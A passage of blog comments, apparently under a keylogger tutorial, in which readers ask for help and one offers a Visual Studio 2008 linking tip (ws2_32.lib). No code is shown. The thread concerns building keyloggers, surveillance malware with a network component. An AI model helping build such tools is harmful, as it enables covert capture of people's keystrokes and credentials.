    help me please!!!

    ReplyDelete
  44. Is this still alive? i just made a keylogger & it works perfectly.. bt having some doubts..
    can you help me?

    ReplyDelete
  45. If you use Visual Studio 2008, add ws2_32.lib to "additional library dependencies".

    ReplyDelete